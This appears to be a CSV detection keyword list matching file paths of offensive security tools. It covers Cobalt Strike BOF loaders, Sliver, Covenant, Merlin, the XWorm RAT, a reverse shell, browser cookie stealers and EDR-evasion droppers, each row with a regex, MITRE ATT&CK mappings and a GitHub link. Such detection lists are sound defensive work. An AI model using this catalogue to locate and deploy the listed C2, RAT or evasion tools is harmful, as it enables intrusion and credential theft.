"*/COFFLoader*",".{0,1000}\/COFFLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/COFFLoader.exe*",".{0,1000}\/COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/COFFLoader2/*",".{0,1000}\/COFFLoader2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","181","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*/collection/screengrab*",".{0,1000}\/collection\/screengrab.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/com/blackh4t/*",".{0,1000}\/com\/blackh4t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/combine_harvester.git*",".{0,1000}\/combine_harvester\.git.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*/comfoo.profile*",".{0,1000}\/comfoo\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/COMHijackToolkit.ps1*",".{0,1000}\/COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/COM-Hunter.csproj*",".{0,1000}\/COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*/COM-Hunter.exe*",".{0,1000}\/COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*/COM-Hunter.git*",".{0,1000}\/COM\-Hunter\.git.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*/COM-Hunter.sln*",".{0,1000}\/COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*/COMInjectTarget.dll*",".{0,1000}\/COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/Command Reciever.exe*",".{0,1000}\/Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Command%20Reciever.exe*",".{0,1000}\/Command\%20Reciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/command/exec/sideload.go*",".{0,1000}\/command\/exec\/sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/command/exec/spawndll.go*",".{0,1000}\/command\/exec\/spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/command_exec.exe*",".{0,1000}\/command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/commandcontrol/malware*.py*",".{0,1000}\/commandcontrol\/malware.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/commando-vm*",".{0,1000}\/commando\-vm.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*/commix.git",".{0,1000}\/commix\.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4340","797","2024-04-29T06:05:52Z","2015-03-20T08:38:26Z" "*/commix.py*",".{0,1000}\/commix\.py.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4340","797","2024-04-29T06:05:52Z","2015-03-20T08:38:26Z" "*/common/beacon.go*",".{0,1000}\/common\/beacon\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/COM-Object-hijacking.git*",".{0,1000}\/COM\-Object\-hijacking\.git.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*/completions/exegol.fish*",".{0,1000}\/completions\/exegol\.fish.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ComunicationC2.cpp*",".{0,1000}\/ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/CONCRETE_STEEL.exe""*",".{0,1000}\/CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/config/doNmapScanWin.bat *",".{0,1000}\/config\/doNmapScanWin\.bat\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/configdhcpserver.sh*",".{0,1000}\/configdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/Configure-Victim.ps1*",".{0,1000}\/Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/ConfuserEx.exe*",".{0,1000}\/ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/ConfuserEx.git*",".{0,1000}\/ConfuserEx\.git.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/ConfuserEx_bin.zip*",".{0,1000}\/ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/ConPtyShell/*",".{0,1000}\/ConPtyShell\/.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*/ContainYourself.git*",".{0,1000}\/ContainYourself\.git.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*/CookieProcessor.cs*",".{0,1000}\/CookieProcessor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*/Cooolis-ms/*",".{0,1000}\/Cooolis\-ms\/.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*/Cordyceps.git*",".{0,1000}\/Cordyceps\.git.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","3","N/A","N/A","N/A","N/A" "*/core/browser_darwin.go*",".{0,1000}\/core\/browser_darwin\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/core/browser_linux.go*",".{0,1000}\/core\/browser_linux\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/core/browser_windows.go*",".{0,1000}\/core\/browser_windows\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/couchdb-databases.nse*",".{0,1000}\/couchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/couchdb-stats.nse*",".{0,1000}\/couchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Covenant*.cs*",".{0,1000}\/Covenant.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Covenant.git*",".{0,1000}\/Covenant\.git.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Covenant/*",".{0,1000}\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/CovenantUsers/*",".{0,1000}\/CovenantUsers\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/crack.sh/get-cracking/*",".{0,1000}\/\/crack\.sh\/get\-cracking\/.{0,1000}","offensive_tool_keyword","crack.sh","crack.sh THE WORLD???S FASTEST DES CRACKER. Used by attackers to submit passwords to crack","T1110.002 - T1021.002","TA0006 - TA0008","N/A","N/A","Credential Access","https://crack.sh/get-cracking/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crack_list/client_wordlists.py*",".{0,1000}\/crack_list\/client_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" 